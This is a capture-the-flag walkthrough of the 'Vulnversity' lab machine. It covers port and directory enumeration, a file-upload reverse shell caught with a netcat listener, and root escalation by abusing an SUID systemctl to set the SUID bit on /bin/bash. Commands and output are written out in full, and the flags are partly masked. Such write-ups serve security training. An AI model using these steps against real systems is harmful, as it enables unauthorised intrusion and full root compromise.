Esharmaji Walkthrough Vulniversity

VulnUniversity
Enumeration:
nmap -sC -sV 10.10.170.189 -oN initial
21/tcp open ftp vsftpd 3.0.3

22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 5a:4f:fc:b8:c8:76:1c:b5:85:1c:ac:b2:86:41:1c:5a (RSA)
| 256 ac:9d:ec:44:61:0c:28:85:00:88:e9:68:e9:d0:cb:3d (ECDSA)
|_ 256 30:50:cb:70:5a:86:57:22:cb:52:d9:36:34:dc:a5:58 (ED25519)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
3128/tcp open http-proxy Squid http proxy 3.5.12
|_http-server-header: squid/3.5.12
|_http-title: ERROR: The requested URL could not be retrieved
3333/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Vuln University
Service Info: Host: VULNUNIVERSITY; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:

| smb2-time:
| date: 2022-03-16T15:40:52
|_ start_date: N/A
|_clock-skew: mean: 1h19m59s, deviation: 2h18m34s, median: 0s
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
| Computer name: vulnuniversity
| NetBIOS computer name: VULNUNIVERSITY\x00
| Domain name: \x00
| FQDN: vulnuniversity
|_ System time: 2022-03-16T11:40:51-04:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_nbstat: NetBIOS name: VULNUNIVERSITY, NetBIOS user: <unknown>, NetBIOS MAC: <unknown>
(unknown)
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
(root EthicalSharmaji)-[~/THMOSCPPath/vulnuniv]
└─# gobuster dir -u http://10.10.170.189:3333 -w /usr/share/wordlists/dirbuster/directory-list-2.3-
medium.txt -o gobust.txt
/Internal was found.
1/6
.php extension is not working. Hence, tested for other extensions found on google.
2/6
File uploaded successfully. Enumerated for file upload directory and it was successfully found in /
internal/uploads.
Access the uploaded file and shell will spawn on listener!!!
──(root EthicalSharmaji)-[~/THMOSCPPath/vulnuniv]
└─# nc -lvnp 443
listening on [any] 443 ...
connect to [10.17.41.167] from (UNKNOWN) [10.10.170.189] 45306
Linux vulnuniversity 4.4.0-142-generic #168-Ubuntu SMP Wed Jan 16 21:00:45 UTC 2019 x86_64
3/6
x86_64 x86_64 GNU/Linux
13:20:27 up 1:41, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ whoami
www-data
$ ls -al
total 96
drwxr-xr-x 23 root root 4096 Jul 31 2019 .
drwxr-xr-x 23 root root 4096 Jul 31 2019 ..
drwxr-xr-x 2 root root 4096 Jul 31 2019 bin
drwxr-xr-x 3 root root 4096 Jul 31 2019 boot
drwxr-xr-x 17 root root 3700 Mar 16 11:39 dev
drwxr-xr-x 98 root root 4096 Aug 1 2019 etc
drwxr-xr-x 3 root root 4096 Jul 31 2019 home
lrwxrwxrwx 1 root root 33 Jul 31 2019 initrd.img -> boot/initrd.img-4.4.0-142-generic
drwxr-xr-x 22 root root 4096 Jul 31 2019 lib
drwxr-xr-x 2 root root 4096 Jul 31 2019 lib64
drwx------ 2 root root 16384 Jul 31 2019 lost+found
drwxr-xr-x 3 root root 4096 Jul 31 2019 media
drwxr-xr-x 2 root root 4096 Feb 26 2019 mnt
drwxr-xr-x 2 root root 4096 Feb 26 2019 opt
dr-xr-xr-x 137 root root 0 Mar 16 11:38 proc
drwx------ 4 root root 4096 Jul 31 2019 root
drwxr-xr-x 28 root root 980 Mar 16 11:39 run
drwxr-xr-x 2 root root 12288 Jul 31 2019 sbin
drwxr-xr-x 2 root root 4096 Jul 31 2019 snap
drwxr-xr-x 3 root root 4096 Jul 31 2019 srv
dr-xr-xr-x 13 root root 0 Mar 16 11:38 sys
drwxrwxrwt 8 root root 4096 Mar 16 13:17 tmp
drwxr-xr-x 10 root root 4096 Jul 31 2019 usr
drwxr-xr-x 14 root root 4096 Jul 31 2019 var
lrwxrwxrwx 1 root root 30 Jul 31 2019 vmlinuz -> boot/vmlinuz-4.4.0-142-generic
$ cd /home
$ ls
bill
$ cd bill
$ ls
user.txt
$ whoami && cat user.txt && ifconfig
www-data
8bd7992fbe8a6ad*****(Intentionally * added)
eth0 Link encap:Ethernet HWaddr 02:5e:bb:59:0d:97
inet addr:10.10.170.189 Bcast:10.10.255.255 Mask:255.255.0.0
inet6 addr: fe80::5e:bbff:fe59:d97/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:9001 Metric:1
RX packets:96350 errors:0 dropped:0 overruns:0 frame:0
TX packets:94946 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:6669760 (6.6 MB) TX bytes:24660136 (24.6 MB)
lo Link encap:Local Loopback

inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
4/6
UP LOOPBACK RUNNING MTU:65536 Metric:1
RX bytes:58652 (58.6 KB) TX bytes:58652 (58.6 KB)
Privilege Escalation:
$ uname -a
Linux vulnuniversity 4.4.0-142-generic #168-Ubuntu SMP Wed Jan 16 21:00:45 UTC 2019 x86_64
x86_64 x86_64 GNU/Linux
$ find / -perm -u=s -type f 2>/dev/null

/usr/bin/newuidmap
/usr/bin/chfn
/usr/bin/newgidmap
/usr/bin/sudo
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/pkexec
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/at
/usr/lib/snapd/snap-confine
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/squid/pinger
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/bin/su
/bin/ntfs-3g
/bin/mount
/bin/ping6
/bin/umount
/bin/systemctl
/bin/ping
/bin/fusermount
/sbin/mount.cifs
https://gtfobins.github.io/gtfobins/systemctl/
www-data@vulnuniversity:/home/bill$ TF=$(mktemp).service
echo '[Service]
Type=oneshot
ExecStart=/bin/sh -c "chmod +s /bin/bash"
[Install]
WantedBy=multi-user.target' > $TF
/bin/systemctl link $TF
/bin/systemctl enable --now $TFTF=$(mktemp).service
www-data@vulnuniversity:/home/bill$ echo '[Service]
> Type=oneshot
> ExecStart=/bin/sh -c "chmod +s /bin/bash"
> [Install]
> WantedBy=multi-user.target' > $TF
5/6
www-data@vulnuniversity:/home/bill$ /bin/systemctl link $TF
Created symlink from /etc/systemd/system/tmp.gzegTgkVSR.service to /tmp/
tmp.gzegTgkVSR.service.
www-data@vulnuniversity:/home/bill$
/bin/systemctl enable --now $TF
Created symlink from /etc/systemd/system/multi-user.target.wants/tmp.gzegTgkVSR.service to /
tmp/tmp.gzegTgkVSR.service.
www-data@vulnuniversity:/home/bill$ ls -al /bin/bash

ls -al /bin/bash
-rwsr-sr-x 1 root root 1037528 May 16 2017 /bin/bash
www-data@vulnuniversity:/home/bill$ /bin/bash -p
/bin/bash -p
bash-4.3# id
id
uid=33(www-data) gid=33(www-data) euid=0(root) egid=0(root) groups=0(root),33(www-data)
bash-4.3# whoami
whoami
root
bash-4.3# ls
ls
user.txt
bash-4.3# cd /root
cd /root
bash-4.3# ls
ls
root.txt
bash-4.3# whoami && cat root.txt && ifconfig
whoami && cat root.txt && ifconfig
root
a58ff8579f0a9270368d3***** (Intentionally * added)
eth0 link encap:ethernet HWaddr 02:5e:bb:59:0d:97
inet addr:10.10.170.189 Bcast:10.10.255.255 Mask:255.255.0.0
inet6 addr: fe80::5e:bbff:fe59:d97/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:9001 Metric:1
RX bytes:6680997 (6.6 MB) TX bytes:24675647 (24.6 MB)
lo Link encap:Local Loopback

inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:65536 Metric:1
RX bytes:62348 (62.3 KB) TX bytes:62348 (62.3 KB)
6/6

Esharmaji Walkthrough Vulniversity

Uploaded by

Document Information

Original Description:

Original Title

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

Esharmaji Walkthrough Vulniversity

Uploaded by

Copyright:

Available Formats

VulnUniversity

21/tcp open ftp vsftpd 3.0.3

Host script results:

/Internal was found.

Access the uploaded file and shell will spawn on listener!!!

lo Link encap:Local Loopback

$ find / -perm -u=s -type f 2>/dev/null

www-data@vulnuniversity:/home/bill$ ls -al /bin/bash

lo Link encap:Local Loopback

You might also like